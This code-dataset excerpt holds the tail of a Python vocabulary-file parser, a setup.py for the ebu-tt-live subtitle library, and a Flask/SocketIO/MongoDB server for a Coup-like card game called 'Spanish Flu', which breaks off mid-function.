line:\r\n wordE = line[prev_word:line.find(\"phrv\")]\r\n elif (line[letter-2] == \"v\" or line[letter-2] == \"n\") and line[letter-3] == \" \":\r\n wordE = line[prev_word:letter-3]\r\n elif line[letter-4:letter-1] == \"adj\" or line[letter-4:letter-1] == \"adv\":\r\n wordE = line[prev_word:letter-4]\r\n elif \"(adj, v)\" in line:\r\n wordE = 
line[prev_word:line.find(\"(adj, v)\")]\r\n                    else:\r\n                        wordE = line[prev_word:letter-1]\r\n                    \r\n                    if not was_unit:\r\n                        saved_words = save_wordS(wordS, prev_wordE, wordE)\r\n                        dic[saved_words[0]] = saved_words[1]\r\n                        wordS = \"\"\r\n                        loading_slovak = False\r\n                    \r\n                if not ignore_letter and (line[letter] == \".\" or line[letter] == \"!\" or line[letter] == \"?\"):\r\n                    #dot = letter\r\n                    loading_slovak = True\r\n\r\n                if loading_slovak:\r\n                    wordS = wordS + line[letter]\r\n        prev_line = line\r\n        was_unit = False\r\n    \r\n    saved_words = save_wordS(wordS, wordE, wordE)\r\n    dic[saved_words[0]] = saved_words[1]\r\n    vocab.append(dic)\r\n    return vocab\r\n\r\nif __name__ == \"__main__\":\r\n    vocab = create_dic(source)\r\n    n = 0\r\n\r\n    def debug(unit):\r\n        for a, s in vocab[unit].items():\r\n            if s == \"\":\r\n                print(a + \": \" + s)\r\n            if \"[\" in a or \"]\" in a or \"[\" in s or \"]\" in s:\r\n                print(a + \": \" + s)\r\n    def print_all(unit):\r\n        for a, s in vocab[unit].items():\r\n            print(a + \": \" + s)\r\n    \r\n    #debug(9)\r\n    print(vocab)\r\n","sub_path":"Web/web/test/CreateDic.py","file_name":"CreateDic.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"634151565","text":"\ntry:\n    from setuptools import setup\n    extra = dict(test_suite=\"tests.test.suite\", include_package_data=True, tests_require=[])\nexcept ImportError:\n    from distutils.core import setup\n    extra = {}\n\n\npackages=[\n    \"ebu_tt_live\",\n    \"ebu_tt_live.bindings\",\n    \"ebu_tt_live.clocks\",\n    \"ebu_tt_live.scripts\"\n]\n\n\nsetup(\n    name=\"ebu-tt-live\",\n    version=\"0.0.1\",\n    description=\"EBU-TT Part 3 library implementing Specification EBU-3370\",\n    install_requires=[\n        \"PyXB\",\n        \"ipdb\" # This will eventually be removed from here\n    ],\n    license=\"BSD3\",\n    packages=packages,\n    entry_points={\n        'console_scripts': [\n            'ebu-dummy-encoder = ebu_tt_live.scripts.ebu_dummy_encoder:main',\n            'ebu-interactive-shell = ebu_tt_live.scripts.ebu_interactive_shell:main'\n        ]\n    },\n    **extra\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"431845007","text":"#!/usr/bin/env python3\n\nfrom flask import Flask, render_template, redirect, url_for, request, escape, jsonify\nfrom flask_socketio import SocketIO, join_room, leave_room, send, emit\napp = Flask(__name__, instance_relative_config=True)\napp.config.from_pyfile('config.py')\nsocketio = SocketIO(app)\nimport json\nimport random\nimport copy\nimport uuid\nimport pymongo\n\ndb_prefix = '/var/www/BlandGames/'\nmyclient = pymongo.MongoClient(app.config[\"MONGOSTRING\"])\nmydb = myclient[\"dev_db\"]\n\n@app.route('/mon')\ndef mongo():\n    rooms = mydb[\"room\"]\n    rooms.drop()\n\n    rc = RC(rooms)\n    random.seed(0)\n    import pprint\n    pp = pprint.PrettyPrinter(indent=4)\n    rc.create_room('sk', 'p1', True, 'Spanish Flu')\n    rc.join_room('sk', 'p2')\n    rc.join_room('sk', 'p3')\n    rc.join_room('sk', 'p4')\n    rc.modify_room('sk', 'started')\n    action_params = dict()\n    action_params[\"user_name\"] = \"p2\"\n    action_params[\"action\"] = \"income\"\n    
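# Scripted walkthrough: each play_action call below exercises one rule of the handler (turn order, blocks, challenges, reveals, discards)\n    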
rc.modify_room('sk', 'play_action', action_params)\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"foreign_aid\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"block\")) # rightful duke doing a righteous block\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"allow\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"foreign_aid\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"block\")) # another rightful duke doing a righteous challenge\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"challenge\")) # p2 makes an erroneous challenge\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"reveal0\")) # p1 prooves he is the duke\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"discard0\")) # gotta pay for your erroneous challenge\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"foreign_aid\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"block\")) # p1 blocks but is no longer the duke\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"challenge\")) # p3 makes a correct accusation p1 will have to pay\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"reveal1\")) # p1 has to grave something\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"stealp2\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"block\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"stealp4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"assassinatep4\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"discard0\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"income\")) # this was added in late when a bug was fixed\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"exchange\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"doublediscard0_2\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"income\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"infectp1\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p1\", action=\"discard0\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"income\"))\n rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\"))\n rc.modify_room('sk', 
'play_action', params=dict(user_name=\"p3\", action=\"tax\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"tax\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"tax\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p4\", action=\"tax\")) # lets test out what happens when you have 10 coins\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"stealp3\")) # he must infect\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"tax\")) # fails\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"income\")) # fails\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"foreign_aid\")) # fails\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"assassinatep4\")) # fails\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p2\", action=\"infectp3\"))\n    rc.modify_room('sk', 'play_action', params=dict(user_name=\"p3\", action=\"discard0\"))\n\n    myquery = dict()\n    for item in rooms.find(myquery):\n        pp.pprint(item)\n\n\n    #x = mycoll.insert_one(dict(user_name='steve'))\n    #print(x.inserted_id)\n    #myquery = dict(user_name='steve')\n    #for item in mycoll.find(myquery):\n    #    print(item)\n    #print(myclient.list_database_names())\n    # game is one mongodb document and if two people access something at the same time their browser is just told to try again and it does\n    # mycoll.drop()\n    return jsonify(dict(hi=1))\n\nclass RC:\n    def __init__(self, rooms):\n        self.rooms = rooms\n    def create_room(self, room_name, game_master, is_private=False, game_name=''):\n        if self.rooms.find({\"room_name\": room_name}).count() > 0:\n            # If the room exists, join the room\n            return self.join_room(room_name, game_master)\n        game_params = dict()\n        if game_name == 'Spanish Flu':\n            game_params[\"approval_timer\"] = \"disabled\"\n            # game_params[\"approval_timer\"] = \"infinite\"\n            game_params[\"keep_grave_sorted\"] = True\n        return self.rooms.insert_one(dict(room_name=room_name,\n                                          game_master=game_master,\n                                          is_private=is_private,\n                                          game_name=game_name,\n                                          players=[game_master],\n                                          game_state='waiting',\n                                          game_data=dict(),\n                                          game_params=game_params))\n    def delete_room(self, room_name):\n        query={\"room_name\": room_name}\n        self.rooms.delete_many(query)\n    def join_room(self, room_name, user_name):\n        if self.rooms.find({\"room_name\": room_name}).count() == 0:\n            room = self.create_room(room_name, user_name)\n        room = self.rooms.find_one({\"room_name\": room_name})\n        myquery={\"room_name\": room_name}\n        players = []\n        if \"players\" in room:\n            players = room[\"players\"]\n        if user_name not in players:\n            players.append(user_name)\n        newvalues = {\"$set\": {\"players\": players}}\n        self.rooms.update_one(myquery, newvalues)\n        print(room)\n        return room is not None\n    def modify_room(self, room_name, action, params=dict()):\n        changed = False\n        query={\"room_name\": room_name}\n        if action == 'waiting':\n            query={\"room_name\": room_name}\n            newvalues = {\"$set\": {\"game_state\": \"waiting\"}}\n            self.rooms.update_one(query, newvalues)\n            changed = True\n        elif action == 'started':\n            query={\"room_name\": room_name, 
\"game_state\": \"waiting\",\n \"game_name\": \"Spanish Flu\"}\n room = self.rooms.find_one(query);\n if room is not None:\n newvalues = {\"$set\": {\n \"game_state\": \"started\",\n \"game_data\": RC.create_game(room)}\n }\n self.rooms.update_one(query, newvalues)\n changed=True\n elif action == 'play_action':\n query={\"room_name\": room_name, \"game_state\": \"started\",\n \"game_name\": \"Spanish Flu\"}\n room = self.rooms.find_one(query);\n if room is not None:\n game_data = RC.action_game(room, params) \n if game_data is not None:\n newvalues = {\"$set\": {\n \"game_data\": game_data}\n }\n self.rooms.update_one(query, newvalues)\n changed = True\n return changed\n\n def get_next_player_name(game_data, last_player):\n players = game_data[\"players\"]\n found_last = False\n for i in range(len(players)*2):\n player = players[i % len(players)]\n if found_last == True and len(player[\"cards\"]) > 0:\n return player[\"user_name\"]\n if player[\"user_name\"] == last_player:\n found_last = True\n return 'this should never happen maybe increase you loop length'\n\n def create_game(room):\n deck = []\n for item in [\"Duke\", \"Contessa\", \"Assassin\", \"Ambassador\", \"Captain\"]:\n for i in range(3):\n deck.append(item)\n random.shuffle(deck)\n players = []\n for item in room[\"players\"]:\n player = dict(user_name=item, coins=2, cards = [])\n for i in range(2):\n if len(deck) > 0:\n player[\"cards\"].append(deck.pop())\n players.append(player)\n grave_yard = []\n action_log = [dict(user_name=room[\"game_master\"], action=\"started\")]\n if len(players) > 0:\n waiting_for = [dict(kind='turn', user_name=random.choice(players)[\"user_name\"])]\n else:\n waiting_for = []\n return dict(deck=deck,\n players=players,\n prev_players=copy.deepcopy(players),\n grave_yard=grave_yard,\n action_log=action_log,\n waiting_for=waiting_for)\n def action_game(room, params):\n # Read some params\n user_name = params[\"user_name\"]\n action = params[\"action\"]\n coins = 0\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] == user_name:\n coins = item[\"coins\"]\n\n # Check if action is allowed and expire appropriate waiting_for actions\n # TODO MORE ALLOWED VALIDATION IN HERE LIKE DOES THAT PERSON EXIST OR DO YOU HAVE THE CARDS TO DISCARD\n allowed = False\n for item in room[\"game_data\"][\"waiting_for\"]:\n if action == \"income\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"foreign_aid\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"tax\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"steal\") and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"assassinate\") and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10 and coins >= 3:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"exchange\" and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name and coins < 10:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"doublediscard\") and item[\"kind\"] == \"doublediscard\" and item[\"user_name\"] == user_name:\n 
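# after an exchange the player holds two extra cards and owes two back; this clears that pending prompt\n                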
room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"infect\") and item[\"kind\"] == \"turn\" and item[\"user_name\"] == user_name:\n if coins >= 7:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed=True\n elif action == \"allow\" and item[\"kind\"] == \"block\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"].remove(dict(kind=\"block\", user_name=user_name))\n allowed = True\n elif action == \"allow\" and item[\"kind\"] == \"challenge\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"].remove(dict(kind=\"challenge\", user_name=user_name))\n allowed = True\n elif action == \"block\" and item[\"kind\"] == \"block\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action == \"challenge\" and item[\"kind\"] == \"challenge\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n elif action.startswith(\"reveal\") and item[\"kind\"] == \"reveal\" and item[\"user_name\"] == user_name:\n reveal_index = int(action.replace(\"reveal\", \"\"))\n for player in room[\"game_data\"][\"players\"]:\n if player[\"user_name\"] == user_name:\n if reveal_index >= len(player[\"cards\"]):\n allowed=False\n else:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n break\n elif action.startswith(\"discard\") and item[\"kind\"] == \"discard\" and item[\"user_name\"] == user_name:\n discard_index = int(action.replace(\"discard\", \"\"))\n for player in room[\"game_data\"][\"players\"]:\n if player[\"user_name\"] == user_name:\n if discard_index >= len(player[\"cards\"]):\n allowed=False\n else:\n room[\"game_data\"][\"waiting_for\"] = []\n allowed = True\n break\n if not allowed:\n return None\n\n # Add the allowed action to the log\n room[\"game_data\"][\"action_log\"].append(params)\n\n # Modify cards and coins with turn actions that cant be undone\n players = room[\"game_data\"][\"players\"]\n for item in players:\n if action.startswith(\"assassinate\") and item[\"user_name\"] == user_name:\n item[\"coins\"] -= 3\n\n # Backup the game state (for potential blocks)\n if action != \"allow\" and action != \"challenge\" and not action.startswith(\"reveal\") and not action.startswith('discard') and not action.startswith('doublediscard'):\n # action and challenge dont change game state and shouldnt blow away valuable saved backup\n # harmless for income to do a backup\n # required for foreign aid to do a backup\n # required for a block to do a backup\n temp_backup = copy.deepcopy(room[\"game_data\"][\"prev_players\"])\n room[\"game_data\"][\"prev_players\"] = copy.deepcopy(room[\"game_data\"][\"players\"])\n\n # Modify cards and coins with the turn actions\n players = room[\"game_data\"][\"players\"]\n for item in players:\n if action == \"income\" and item[\"user_name\"] == user_name:\n item[\"coins\"] += 1\n elif action == \"foreign_aid\" and item[\"user_name\"] == user_name:\n item[\"coins\"] += 2\n elif action == \"tax\" and item[\"user_name\"] == user_name:\n item[\"coins\"] += 3\n elif action == \"exchange\" and item[\"user_name\"] == user_name:\n room[\"game_data\"][\"pre_exchange_cards\"] = copy.deepcopy(item[\"cards\"])\n deck = room[\"game_data\"][\"deck\"]\n if len(deck) > 0:\n random.shuffle(deck)\n item[\"cards\"].append(deck.pop())\n if len(deck) > 0:\n random.shuffle(deck)\n item[\"cards\"].append(deck.pop())\n elif action.startswith('doublediscard') and item[\"user_name\"] == user_name:\n tmp = 
action.replace(\"doublediscard\", \"\")\n idxes = sorted(list(int(i) for i in tmp.split(\"_\")))\n # do sorting then back to front for indexing issues\n room[\"game_data\"][\"deck\"].append(item[\"cards\"].pop(idxes[1]))\n room[\"game_data\"][\"deck\"].append(item[\"cards\"].pop(idxes[0]))\n elif action.startswith('infect') and item[\"user_name\"] == user_name:\n item[\"coins\"] -= 7\n elif action.startswith('discard') and item[\"user_name\"] == user_name:\n discard_index = int(action.replace(\"discard\", \"\"))\n for player in room[\"game_data\"][\"players\"]:\n if player[\"user_name\"] == user_name:\n card = player[\"cards\"].pop(discard_index)\n room[\"game_data\"][\"grave_yard\"].append(card)\n break\n for item in players:\n if action.replace(\"steal\", \"\") == item[\"user_name\"]:\n stolen = min(2, item[\"coins\"])\n item[\"coins\"] -= stolen\n for item in players:\n if action.startswith(\"steal\") and item[\"user_name\"] == user_name:\n item[\"coins\"] += stolen\n\n if action == \"block\":\n room[\"game_data\"][\"players\"] = temp_backup\n elif action.startswith(\"reveal\"):\n # check legitimacy\n reveal_index = int(action.replace(\"reveal\", \"\"))\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"tax\", \"exchange\", \"block\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\"):\n challenged_action = item[\"action\"]\n break\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"foreign_aid\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\"):\n preblock_action = item[\"action\"]\n break\n for item in room[\"game_data\"][\"players\"]:\n if user_name == item[\"user_name\"]:\n revealed_card = item[\"cards\"].pop(reveal_index)\n break\n if challenged_action == 'exchange':\n revealed_card = room[\"game_data\"][\"pre_exchange_cards\"][reveal_index]\n claim_prooved = False\n if challenged_action == 'block':\n if preblock_action == 'foreign_aid':\n if revealed_card == 'Duke':\n claim_prooved = True\n elif preblock_action.startswith('steal'):\n if revealed_card == 'Captain' or revealed_card == \"Ambassador\":\n claim_prooved = True\n elif preblock_action.startswith('assassinate'):\n if revealed_card == 'Contessa':\n claim_prooved = True\n elif challenged_action == 'tax':\n if revealed_card == 'Duke':\n claim_prooved = True\n elif challenged_action.startswith('steal'):\n if revealed_card == 'Captain':\n claim_prooved = True\n elif challenged_action.startswith('assassinate'):\n if revealed_card == \"Assassin\":\n claim_prooved = True\n elif challenged_action == 'exchange':\n if revealed_card == 'Ambassador':\n claim_prooved = True\n if claim_prooved:\n # player that just did the reveal gets their card sent to the deck and they get a new one\n room[\"game_data\"][\"deck\"].append(revealed_card)\n random.shuffle(room[\"game_data\"][\"deck\"])\n for item in room[\"game_data\"][\"players\"]:\n if user_name == item[\"user_name\"]:\n if len(room[\"game_data\"][\"deck\"]) > 0:\n item[\"cards\"].append(room[\"game_data\"][\"deck\"].pop())\n # the challenger must be punished\n print('claim prooved - punish the challenger at the end of this function')\n else:\n # Restore game state to before the saved (challenged) action\n room[\"game_data\"][\"players\"] = copy.deepcopy(room[\"game_data\"][\"prev_players\"])\n # Punish the challenged player by graveyarding the card they just revealed\n for item in room[\"game_data\"][\"players\"]:\n if 
user_name == item[\"user_name\"]:\n # gotta redo the pop here because the deepcopy above will undo it\n revealed_card = item[\"cards\"].pop(reveal_index)\n break\n room[\"game_data\"][\"grave_yard\"].append(revealed_card)\n\n # Add next actions game can wait for\n if action == 'income':\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n elif action == 'foreign_aid':\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='block', user_name=item[\"user_name\"]))\n elif action == \"tax\" or action.startswith(\"steal\"):\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if action.startswith('steal') and item[\"user_name\"] == action.replace('steal', ''):\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='block', user_name=item[\"user_name\"]))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action == \"allow\" and len(room[\"game_data\"][\"waiting_for\"]) == 0:\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n elif action.startswith('assassinate'):\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='discard', user_name=action.replace(\"assassinate\", \"\")))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='block', user_name=item[\"user_name\"]))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action == \"exchange\":\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='doublediscard', user_name=user_name))\n elif action.startswith(\"doublediscard\"):\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n next_player = RC.get_next_player_name(room[\"game_data\"], user_name)\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action.startswith('infect'):\n victim = action.replace('infect', '')\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='discard', user_name=victim))\n elif action == \"block\":\n if room[\"game_params\"][\"approval_timer\"] == \"disabled\":\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if 
item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n for item in room[\"game_data\"][\"players\"]:\n if item[\"user_name\"] != user_name:\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='challenge', user_name=item[\"user_name\"]))\n elif action == \"challenge\":\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\", \"block\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n challenged_user = item[\"user_name\"]\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='reveal', user_name=challenged_user))\n elif action.startswith(\"reveal\"):\n if claim_prooved:\n # next action must be challenger penalized\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] == \"challenge\":\n challenger = item[\"user_name\"]\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='discard', user_name=challenger))\n else:\n # Challenge is over - the pretender was caught lets move the game along to the next turn\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n elif action.startswith(\"discard\"):\n # Challenge is over - the false accuser was punished lets move the game along\n for item in reversed(room[\"game_data\"][\"action_log\"]):\n if item[\"action\"] in [\"income\", \"foreign_aid\", \"tax\", \"exchange\"] or item[\"action\"].startswith(\"steal\") or item[\"action\"].startswith(\"assassinate\") or item[\"action\"].startswith(\"infect\"):\n next_player = RC.get_next_player_name(room[\"game_data\"], item[\"user_name\"])\n break\n room[\"game_data\"][\"waiting_for\"].append(dict(kind='turn', user_name=next_player))\n\n\n return room[\"game_data\"]\n\n@socketio.on('load play page')\ndef load_play_page(json):\n print('rx msg ' + str(json))\n join_room(json['room_name']) # this is a socketio function that i happen to have a name collision with\n emit('update', get_game_state(json[\"user_name\"], json[\"room_name\"], to_jsonify=False))\n\n@socketio.on('play action')\ndef play_action(json):\n print('rx msg ' + str(json))\n rooms = mydb[\"room\"]\n rc = RC(rooms)\n\n print(json[\"action\"])\n if \"action\" in json and json[\"action\"] == \"reset_game\" and \"room_name\" in json:\n rc.modify_room(json[\"room_name\"], 'waiting')\n rc.modify_room(json[\"room_name\"], 'started')\n\n\n if \"room_name\" in json and \"user_name\" in json and \"action\" in json:\n truth = rc.modify_room(json[\"room_name\"], 'play_action', params=dict(user_name=json[\"user_name\"], action=json[\"action\"]))\n print (truth)\n game_state = get_game_state(json[\"user_name\"], json[\"room_name\"], to_jsonify=False)\n game_state['success'] = truth\n emit('update', game_state, 
room=json[\"room_name\"])\n\n\n@app.route('/get_game_state//')\ndef get_game_state(user_name, room_name, to_jsonify=True):\n myclient = pymongo.MongoClient(app.config[\"MONGOSTRING\"])\n mydb = myclient[\"dev_db\"]\n rooms = mydb[\"room\"]\n room = rooms.find_one({\"room_name\": room_name})\n game_data = room[\"game_data\"]\n game_data[\"game_master\"] = room[\"game_master\"]\n #for item in game_data[\"players\"]: # commend this out for now, we'd prefer to have cards totally hidden from web clients but i want the game to work first\n # if item[\"user_name\"] != user_name:\n # for i, card in enumerate(item[\"cards\"]):\n # item[\"cards\"][i] = \"hidden\"\n for i, item in enumerate(game_data[\"deck\"]):\n game_data[\"deck\"][i] = \"hidden\"\n if room[\"game_params\"][\"keep_grave_sorted\"]:\n game_data[\"grave_yard\"] = sorted(game_data[\"grave_yard\"])\n del game_data[\"prev_players\"]\n if to_jsonify:\n return jsonify(room[\"game_data\"])\n else:\n return room[\"game_data\"]\n\n@app.route('/mongo_play_page//')\ndef mongo_play_page(user_name, room_name):\n game_data = get_game_state(user_name, room_name, to_jsonify=False)\n kwargs = dict(user_name=user_name,\n room_name=room_name,\n game_master=game_data[\"game_master\"],\n players=game_data[\"players\"],\n activity_log=game_data[\"action_log\"],\n waiting_for = game_data[\"waiting_for\"],\n deck_size = len(game_data[\"deck\"]),\n grave_yard = game_data[\"grave_yard\"],\n alternate_js=True)\n return render_template('mongo_play_page.html', **kwargs)\n\n@app.route('/')\ndef hello():\n return render_template('landing_page.html')\n #return redirect(url_for('join_page'))\n\n@app.route('/action///')\ndef action(user_name, action_string, room_name):\n is_ajax = False\n with open(db_prefix+'state.json', \"r\") as statef:\n state = json.load(statef)\n room = state.get('rooms', dict(room_name=None)).get(room_name, None)\n if room is None:\n return \"Room Not Found\" # TODO\n game_data = room.get(\"game_data\", dict())\n room[\"game_data\"] = game_data\n game_data['activity_log'] = game_data.get('activity_log', [])\n act_split = action_string.split('_')\n print(act_split)\n if act_split[0] == \"increase\":\n for item in game_data.get('players', []):\n if item.get('user_name', '') == act_split[1]:\n item['n_coins'] += 1\n if act_split[0] == \"decrease\":\n for item in game_data.get('players'):\n if item.get('user_name', '') == act_split[1]:\n print('dec steve')\n item['n_coins'] -= 1\n if act_split[0] == \"reveal\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n for card in player.get('cards', []):\n if str(card['id']) == act_split[1]:\n card['hidden'] = False\n if act_split[0] == \"hide\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n for card in player.get('cards', []):\n if str(card['id']) == act_split[1]:\n card['hidden'] = True\n if act_split[0] == \"grave\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n hand = []\n for card in player.get('cards', []):\n if str(card['id']) == act_split[1]:\n game_data['graveyard'].append(card)\n else:\n hand.append(card)\n player['cards'] = hand\n if act_split[0] == \"deck\":\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n hand = []\n for card in player.get('cards', []):\n if str(card['id']) == 